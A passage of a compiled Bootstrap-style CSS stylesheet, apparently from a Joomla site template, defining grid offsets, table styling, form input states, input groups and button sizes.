  .col-lg-push-3 {
    left: 25%;
  }
  .col-lg-push-2 {
    left: 16.66666667%;
  }
  .col-lg-push-1 {
    left: 8.33333333%;
  }
  .col-lg-push-0 {
    left: auto;
  }
  .col-lg-offset-12 {
    margin-left: 100%;
  }
  .col-lg-offset-11 {
    margin-left: 91.66666667%;
  }
  .col-lg-offset-10 {
    margin-left: 83.33333333%;
  }
  .col-lg-offset-9 {
    margin-left: 75%;
  }
  .col-lg-offset-8 {
    margin-left: 66.66666667%;
  }
  .col-lg-offset-7 {
    margin-left: 58.33333333%;
  }
  .col-lg-offset-6 {
    margin-left: 50%;
  }
  .col-lg-offset-5 {
    margin-left: 41.66666667%;
  }
  .col-lg-offset-4 {
    margin-left: 33.33333333%;
  }
  .col-lg-offset-3 {
    margin-left: 25%;
  }
  .col-lg-offset-2 {
    margin-left: 16.66666667%;
  }
  .col-lg-offset-1 {
    margin-left: 8.33333333%;
  }
  .col-lg-offset-0 {
    margin-left: 0%;
  }
}
table {
  background-color: transparent;
}
caption {
  padding-top: 8px;
  padding-bottom: 8px;
  color: #999999;
  text-align: left;
}
th {
  text-align: left;
}
.table {
  width: 100%;
  max-width: 100%;
  margin-bottom: 20px;
}
.table > thead > tr > th,
.table > tbody > tr > th,
.table > tfoot > tr > th,
.table > thead > tr > td,
.table > tbody > tr > td,
.table > tfoot > tr > td {
  padding: 8px;
  line-height: 1.42857143;
  vertical-align: top;
  border-top: 1px solid #dddddd;
}
.table > thead > tr > th {
  vertical-align: bottom;
  border-bottom: 2px solid #dddddd;
}
.table > caption + thead > tr:first-child > th,
.table > colgroup + thead > tr:first-child > th,
.table > thead:first-child > tr:first-child > th,
.table > caption + thead > tr:first-child > td,
.table > colgroup + thead > tr:first-child > td,
.table > thead:first-child > tr:first-child > td {
  border-top: 0;
}
.table > tbody + tbody {
  border-top: 2px solid #dddddd;
}
.table .table {
  background-color: #ffffff;
}
.table-condensed > thead > tr > th,
.table-condensed > tbody > tr > th,
.table-condensed > tfoot > tr > th,
.table-condensed > thead > tr > td,
.table-condensed > tbody > tr > td,
.table-condensed > tfoot > tr > td {
  padding: 5px;
}
.table-bordered {
  border: 1px solid #dddddd;
}
.table-bordered > thead > tr > th,
.table-bordered > tbody > tr > th,
.table-bordered > tfoot > tr > th,
.table-bordered > thead > tr > td,
.table-bordered > tbody > tr > td,
.table-bordered > tfoot > tr > td {
  border: 1px solid #dddddd;
}
.table-bordered > thead > tr > th,
.table-bordered > thead > tr > td {
  border-bottom-width: 2px;
}
.table-striped > tbody > tr:nth-of-type(odd) {
  background-color: #f9f9f9;
}
.table-hover > tbody > tr:hover {
  background-color: #f5f5f5;
}
table col[class*="col-"] {
  position: static;
  float: none;
  display: table-column;
}
table td[class*="col-"],
table th[class*="col-"] {
  position: static;
  float: none;
  display: table-cell;
}
.table > thead > tr > td.active,
.table > tbody > tr > td.active,
.table > tfoot > tr > td.active,
.table > thead > tr > th.active,
.table > tbody > tr > th.active,
.table > tfoot > tr > th.active,
.table > thead > tr.active > td,
.table > tbody > tr.active > td,
.table > tfoot > tr.active > td,
.table > thead > tr.active > th,
.table > tbody > tr.active > th,
.table > tfoot > tr.active > th {
  background-color: #f5f5f5;
}
.table-hover > tbody > tr > td.active:hover,
.table-hover > tbody > tr > th.active:hover,
.table-hover > tbody > tr.active:hover > td,
.table-hover > tbody > tr:hover > .active,
.table-hover > tbody > tr.active:hover > th {
  background-color: #e8e8e8;
}
.table > thead > tr > td.success,
.table > tbody > tr > td.success,
.table > tfoot > tr > td.success,
.table > thead > tr > th.success,
.table > tbody > tr > th.success,
.table > tfoot > tr > th.success,
.table > thead > tr.success > td,
.table > tbody > tr.success > td,
.table > tfoot > tr.success > td,
.table > thead > tr.success > th,
.table > tbody > tr.success > th,
.table > tfoot > tr.success > th {
  background-color: #dff0d8;
}
.table-hover > tbody > tr > td.success:hover,
.table-hover > tbody > tr > th.success:hover,
.table-hover > tbody > tr.success:hover > td,
.table-hover > tbody > tr:hover > .success,
.table-hover > tbody > tr.success:hover > th {
  background-color: #d0e9c6;
}
.table > thead > tr > td.info,
.table > tbody > tr > td.info,
.table > tfoot > tr > td.info,
.table > thead > tr > th.info,
.table > tbody > tr > th.info,
.table > tfoot > tr > th.info,
.table > thead > tr.info > td,
.table > tbody > tr.info > td,
.table > tfoot > tr.info > td,
.table > thead > tr.info > th,
.table > tbody > tr.info > th,
.table > tfoot > tr.info > th {
  background-color: #d9edf7;
}
.table-hover > tbody > tr > td.info:hover,
.table-hover > tbody > tr > th.info:hover,
.table-hover > tbody > tr.info:hover > td,
.table-hover > tbody > tr:hover > .info,
.table-hover > tbody > tr.info:hover > th {
  background-color: #c4e3f3;
}
.table > thead > tr > td.warning,
.table > tbody > tr > td.warning,
.table > tfoot > tr > td.warning,
.table > thead > tr > th.warning,
.table > tbody > tr > th.warning,
.table > tfoot > tr > th.warning,
.table > thead > tr.warning > td,
.table > tbody > tr.warning > td,
.table > tfoot > tr.warning > td,
.table > thead > tr.warning > th,
.table > tbody > tr.warning > th,
.table > tfoot > tr.warning > th {
  background-color: #fcf8e3;
}
.table-hover > tbody > tr > td.warning:hover,
.table-hover > tbody > tr > th.warning:hover,
.table-hover > tbody > tr.warning:hover > td,
.table-hover > tbody > tr:hover > .warning,
.table-hover > tbody > tr.warning:hover > th {
  background-color: #faf2cc;
}
.table > thead > tr > td.danger,
.table > tbody > tr > td.danger,
.table > tfoot > tr > td.danger,
.table > thead > tr > th.danger,
.table > tbody > tr > th.danger,
.table > tfoot > tr > th.danger,
.table > thead > tr.danger > td,
.table > tbody > tr.danger > td,
.table > tfoot > tr.danger > td,
.table > thead > tr.danger > th,
.table > tbody > tr.danger > th,
.table > tfoot > tr.danger > th {
  background-color: #f2dede;
}
.table-hover > tbody > tr > td.danger:hover,
.table-hover > tbody > tr > th.danger:hover,
.table-hover > tbody > tr.danger:hover > td,
.table-hover > tbody > tr:hover > .danger,
.table-hover > tbody > tr.danger:hover > th {
  background-color: #ebcccc;
}
.table-responsive {
  overflow-x: auto;
  min-height: 0.01%;
}
@media screen and (max-width: 767px) {
  .table-responsive {
    width: 100%;
    margin-bottom: 15px;
    overflow-y: hidden;
    -ms-overflow-style: -ms-autohiding-scrollbar;
    border: 1px solid #dddddd;
  }
  .table-responsive > .table {
    margin-bottom: 0;
  }
  .table-responsive > .table > thead > tr > th,
  .table-responsive > .table > tbody > tr > th,
  .table-responsive > .table > tfoot > tr > th,
  .table-responsive > .table > thead > tr > td,
  .table-responsive > .table > tbody > tr > td,
  .table-responsive > .table > tfoot > tr > td {
    white-space: nowrap;
  }
  .table-responsive > .table-bordered {
    border: 0;
  }
  .table-responsive > .table-bordered > thead > tr > th:first-child,
  .table-responsive > .table-bordered > tbody > tr > th:first-child,
  .table-responsive > .table-bordered > tfoot > tr > th:first-child,
  .table-responsive > .table-bordered > thead > tr > td:first-child,
  .table-responsive > .table-bordered > tbody > tr > td:first-child,
  .table-responsive > .table-bordered > tfoot > tr > td:first-child {
    border-left: 0;
  }
  .table-responsive > .table-bordered > thead > tr > th:last-child,
  .table-responsive > .table-bordered > tbody > tr > th:last-child,
  .table-responsive > .table-bordered > tfoot > tr > th:last-child,
  .table-responsive > .table-bordered > thead > tr > td:last-child,
  .table-responsive > .table-bordered > tbody > tr > td:last-child,
  .table-responsive > .table-bordered > tfoot > tr > td:last-child {
    border-right: 0;
  }
  .table-responsive > .table-bordered > tbody > tr:last-child > th,
  .table-responsive > .table-bordered > tfoot > tr:last-child > th,
  .table-responsive > .table-bordered > tbody > tr:last-child > td,
  .table-responsive > .table-bordered > tfoot > tr:last-child > td {
    border-bottom: 0;
  }
}
select,
textarea,
input[type="text"],
input[type="password"],
input[type="datetime"],
input[type="datetime-local"],
input[type="date"],
input[type="month"],
input[type="time"],
input[type="week"],
input[type="number"],
input[type="email"],
input[type="url"],
input[type="search"],
input[type="tel"],
input[type="color"],
.inputbox {
  display: block;
  width: 100%;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
  background-color: #ffffff;
  background-image: none;
  border: 1px solid #cccccc;
  border-radius: 0px;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
select:focus,
textarea:focus,
input[type="text"]:focus,
input[type="password"]:focus,
input[type="datetime"]:focus,
input[type="datetime-local"]:focus,
input[type="date"]:focus,
input[type="month"]:focus,
input[type="time"]:focus,
input[type="week"]:focus,
input[type="number"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="search"]:focus,
input[type="tel"]:focus,
input[type="color"]:focus,
.inputbox:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
select[readonly],
textarea[readonly],
input[type="text"][readonly],
input[type="password"][readonly],
input[type="datetime"][readonly],
input[type="datetime-local"][readonly],
input[type="date"][readonly],
input[type="month"][readonly],
input[type="time"][readonly],
input[type="week"][readonly],
input[type="number"][readonly],
input[type="email"][readonly],
input[type="url"][readonly],
input[type="search"][readonly],
input[type="tel"][readonly],
input[type="color"][readonly],
.inputbox[readonly],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  background-color: #eeeeee;
  opacity: 1;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  cursor: not-allowed;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
select:focus,
textarea:focus,
input[type="text"]:focus,
input[type="password"]:focus,
input[type="datetime"]:focus,
input[type="datetime-local"]:focus,
input[type="date"]:focus,
input[type="month"]:focus,
input[type="time"]:focus,
input[type="week"]:focus,
input[type="number"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="search"]:focus,
input[type="tel"]:focus,
input[type="color"]:focus,
.inputbox:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
select[readonly],
textarea[readonly],
input[type="text"][readonly],
input[type="password"][readonly],
input[type="datetime"][readonly],
input[type="datetime-local"][readonly],
input[type="date"][readonly],
input[type="month"][readonly],
input[type="time"][readonly],
input[type="week"][readonly],
input[type="number"][readonly],
input[type="email"][readonly],
input[type="url"][readonly],
input[type="search"][readonly],
input[type="tel"][readonly],
input[type="color"][readonly],
.inputbox[readonly],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  cursor: not-allowed;
  background-color: #eeeeee;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
@media screen and (min-width: 768px) {
  select,
  textarea,
  input[type="text"],
  input[type="password"],
  input[type="datetime"],
  input[type="datetime-local"],
  input[type="date"],
  input[type="month"],
  input[type="time"],
  input[type="week"],
  input[type="number"],
  input[type="email"],
  input[type="url"],
  input[type="search"],
  input[type="tel"],
  input[type="color"],
  .inputbox {
    width: auto;
  }
}
select,
select.form-control,
select.inputbox,
select.input {
  padding-right: 5px;
}
.input-mini {
  width: 60px;
}
.input-small {
  width: 90px;
}
.input-medium {
  width: 150px;
}
.input-large {
  width: 210px;
}
.input-xlarge {
  width: 270px;
}
.input-xxlarge {
  width: 530px;
}
input.input-sm {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0px;
}
selectinput.input-sm {
  height: 30px;
  line-height: 30px;
}
textareainput.input-sm,
select[multiple]input.input-sm {
  height: auto;
}
input.input-lg {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0px;
}
selectinput.input-lg {
  height: 45px;
  line-height: 45px;
}
textareainput.input-lg,
select[multiple]input.input-lg {
  height: auto;
}
@media (min-width: 768px) {
  .form-inline .inputbox,
  .form-inline select,
  .form-inline textarea,
  .form-inline input {
    display: inline-block;
  }
}
.control-group {
  margin-bottom: 10px;
}
legend + .control-group {
  margin-top: 20px;
  -webkit-margin-top-collapse: separate;
}
.form-horizontal .control-group {
  margin-bottom: 20px;
}
.form-horizontal .control-group:before,
.form-horizontal .control-group:after {
  content: " ";
  display: table;
}
.form-horizontal .control-group:after {
  clear: both;
}
.form-horizontal .control-group:before,
.form-horizontal .control-group:after {
  content: " ";
  display: table;
}
.form-horizontal .control-group:after {
  clear: both;
}
.form-horizontal .control-group .control-label {
  display: block;
  width: 100%;
}
@media (min-width: 768px) {
  .form-horizontal .control-group .control-label {
    display: inline-block;
    float: left;
    width: 160px;
    padding-top: 5px;
    text-align: right;
  }
}
.form-horizontal .control-group .controls {
  margin-left: 180px;
}
.form-actions {
  padding: 20px;
  margin: 20px 0;
  background-color: #eeeeee;
  border-radius: 0px;
}
.form-actions:before,
.form-actions:after {
  content: " ";
  display: table;
}
.form-actions:after {
  clear: both;
}
.form-actions:before,
.form-actions:after {
  content: " ";
  display: table;
}
.form-actions:after {
  clear: both;
}
.form-actions [class*="col-sm-offset-"],
.form-actions [class*="col-md-offset-"] {
  padding-left: 5px !important;
}
.input-append,
.input-prepend {
  display: inline-block;
  margin-bottom: 10px;
  vertical-align: middle;
  font-size: 0;
  white-space: nowrap;
}
.input-append input,
.input-prepend input,
.input-append select,
.input-prepend select,
.input-append .uneditable-input,
.input-prepend .uneditable-input,
.input-append .dropdown-menu,
.input-prepend .dropdown-menu,
.input-append .popover,
.input-prepend .popover {
  font-size: 14px;
}
.input-append input,
.input-prepend input,
.input-append select,
.input-prepend select,
.input-append .uneditable-input,
.input-prepend .uneditable-input {
  position: relative;
  margin-bottom: 0;
  *margin-left: 0;
  vertical-align: top;
  border-radius: 0 0px 0px 0;
}
.input-append input:focus,
.input-prepend input:focus,
.input-append select:focus,
.input-prepend select:focus,
.input-append .uneditable-input:focus,
.input-prepend .uneditable-input:focus {
  z-index: 2;
}
.input-append .add-on,
.input-prepend .add-on {
  display: inline-block;
  width: auto;
  height: 34px;
  min-width: 16px;
  padding: 4px 5px;
  font-size: 14px;
  font-weight: normal;
  line-height: 1.42857143;
  text-align: center;
  background-color: #eeeeee;
  border: 1px solid #ccc;
}
.input-append .add-on,
.input-prepend .add-on,
.input-append .btn,
.input-prepend .btn,
.input-append .btn-group > .dropdown-toggle,
.input-prepend .btn-group > .dropdown-toggle {
  vertical-align: top;
  border-radius: 0;
}
.input-append .active,
.input-prepend .active {
  background-color: #9bd7a8;
  border-color: #3e9b52;
}
.input-prepend .add-on,
.input-prepend .btn {
  margin-right: -1px;
}
.input-prepend .add-on:first-child,
.input-prepend .btn:first-child {
  border-radius: 0px 0 0 0px;
}
.input-append input,
.input-append select,
.input-append .uneditable-input {
  border-radius: 0px 0 0 0px;
}
.input-append input + .btn-group .btn:last-child,
.input-append select + .btn-group .btn:last-child,
.input-append .uneditable-input + .btn-group .btn:last-child {
  border-radius: 0 0px 0px 0;
}
.input-append .add-on,
.input-append .btn,
.input-append .btn-group {
  margin-left: -1px;
}
.input-append .add-on:last-child,
.input-append .btn:last-child,
.input-append .btn-group:last-child > .dropdown-toggle {
  border-radius: 0 0px 0px 0;
}
.input-prepend.input-append input,
.input-prepend.input-append select,
.input-prepend.input-append .uneditable-input {
  border-radius: 0;
}
.input-prepend.input-append input + .btn-group .btn,
.input-prepend.input-append select + .btn-group .btn,
.input-prepend.input-append .uneditable-input + .btn-group .btn {
  border-radius: 0 0px 0px 0;
}
.input-prepend.input-append .add-on:first-child,
.input-prepend.input-append .btn:first-child {
  margin-right: -1px;
  border-radius: 0px 0 0 0px;
}
.input-prepend.input-append .add-on:last-child,
.input-prepend.input-append .btn:last-child {
  margin-left: -1px;
  border-radius: 0 0px 0px 0;
}
.input-prepend.input-append .btn-group:first-child {
  margin-left: 0;
}
.btn-large {
  padding: 10px 16px;
  font-size: 18px;
  border-radius: 0px;
}
.btn-large [class^="icon-"],
.btn-large [class*=" icon-"] {
  margin-top: 4px;
}
.btn-small {
  padding: 5px 10px;
  font-size: 12px;
  border-radius: 0px;
}
.btn-small [class^="icon-"],
.btn-small [class*=" icon-"] {
  margin-top: 0;
}
.btn-mini {
  padding: 2px 4px;
  font-size: 12px;
  border-radius: 0px;
}
.btn-mini [class^="icon-"],
.btn-mini [class*=" icon-"] {
  margin-top: -1px;
}

fieldset {
  padding: 0;
  margin: 0;
  border: 0;
  min-width: 0;
}
legend {
  display: block;
  width: 100%;
  padding: 0;
  margin-bottom: 20px;
  font-size: 21px;
  line-height: inherit;
  color: #444444;
  border: 0;
  border-bottom: 1px solid #e5e5e5;
}
label {
  display: inline-block;
  max-width: 100%;
  margin-bottom: 5px;
  font-weight: bold;
}
input[type="search"] {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
input[type="radio"],
input[type="checkbox"] {
  margin: 4px 0 0;
  margin-top: 1px \9;
  line-height: normal;
}
input[type="file"] {
  display: block;
}
input[type="range"] {
  display: block;
  width: 100%;
}
select[multiple],
select[size] {
  height: auto;
}
input[type="file"]:focus,
input[type="radio"]:focus,
input[type="checkbox"]:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
output {
  display: block;
  padding-top: 7px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
}
.form-control {
  display: block;
  width: 100%;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
  background-color: #ffffff;
  background-image: none;
  border: 1px solid #cccccc;
  border-radius: 0px;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
.form-control:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
}
.form-control::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #999999;
}
.form-control::-webkit-input-placeholder {
  color: #999999;
}
.form-control[disabled],
.form-control[readonly],
fieldset[disabled] .form-control {
  background-color: #eeeeee;
  opacity: 1;
}
.form-control[disabled],
fieldset[disabled] .form-control {
  cursor: not-allowed;
}
textarea.form-control {
  height: auto;
}
input[type="search"] {
  -webkit-appearance: none;
}
@media screen and (-webkit-min-device-pixel-ratio: 0) {
  input[type="date"],
  input[type="time"],
  input[type="datetime-local"],
  input[type="month"] {
    line-height: 34px;
  }
  input[type="date"].input-sm,
  input[type="time"].input-sm,
  input[type="datetime-local"].input-sm,
  input[type="month"].input-sm,
  .input-group-sm input[type="date"],
  .input-group-sm input[type="time"],
  .input-group-sm input[type="datetime-local"],
  .input-group-sm input[type="month"] {
    line-height: 30px;
  }
  input[type="date"].input-lg,
  input[type="time"].input-lg,
  input[type="datetime-local"].input-lg,
  input[type="month"].input-lg,
  .input-group-lg input[type="date"],
  .input-group-lg input[type="time"],
  .input-group-lg input[type="datetime-local"],
  .input-group-lg input[type="month"] {
    line-height: 45px;
  }
}
.form-group {
  margin-bottom: 15px;
}
.radio,
.checkbox {
  position: relative;
  display: block;
  margin-top: 10px;
  margin-bottom: 10px;
}
.radio label,
.checkbox label {
  min-height: 20px;
  padding-left: 20px;
  margin-bottom: 0;
  font-weight: normal;
  cursor: pointer;
}
.radio input[type="radio"],
.radio-inline input[type="radio"],
.checkbox input[type="checkbox"],
.checkbox-inline input[type="checkbox"] {
  position: absolute;
  margin-left: -20px;
  margin-top: 4px \9;
}
.radio + .radio,
.checkbox + .checkbox {
  margin-top: -5px;
}
.radio-inline,
.checkbox-inline {
  position: relative;
  display: inline-block;
  padding-left: 20px;
  margin-bottom: 0;
  vertical-align: middle;
  font-weight: normal;
  cursor: pointer;
}
.radio-inline + .radio-inline,
.checkbox-inline + .checkbox-inline {
  margin-top: 0;
  margin-left: 10px;
}
input[type="radio"][disabled],
input[type="checkbox"][disabled],
input[type="radio"].disabled,
input[type="checkbox"].disabled,
fieldset[disabled] input[type="radio"],
fieldset[disabled] input[type="checkbox"] {
  cursor: not-allowed;
}
.radio-inline.disabled,
.checkbox-inline.disabled,
fieldset[disabled] .radio-inline,
fieldset[disabled] .checkbox-inline {
  cursor: not-allowed;
}
.radio.disabled label,
.checkbox.disabled label,
fieldset[disabled] .radio label,
fieldset[disabled] .checkbox label {
  cursor: not-allowed;
}
.form-control-static {
  padding-top: 7px;
  padding-bottom: 7px;
  margin-bottom: 0;
  min-height: 34px;
}
.form-control-static.input-lg,
.form-control-static.input-sm {
  padding-left: 0;
  padding-right: 0;
}
.input-sm {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0px;
}
select.input-sm {
  height: 30px;
  line-height: 30px;
}
textarea.input-sm,
select[multiple].input-sm {
  height: auto;
}
.form-group-sm .form-control {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0px;
}
select.form-group-sm .form-control {
  height: 30px;
  line-height: 30px;
}
textarea.form-group-sm .form-control,
select[multiple].form-group-sm .form-control {
  height: auto;
}
.form-group-sm .form-control-static {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  min-height: 32px;
}
.input-lg {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0px;
}
select.input-lg {
  height: 45px;
  line-height: 45px;
}
textarea.input-lg,
select[multiple].input-lg {
  height: auto;
}
.form-group-lg .form-control {
  height: 45px;
  padding: 10px 16px;
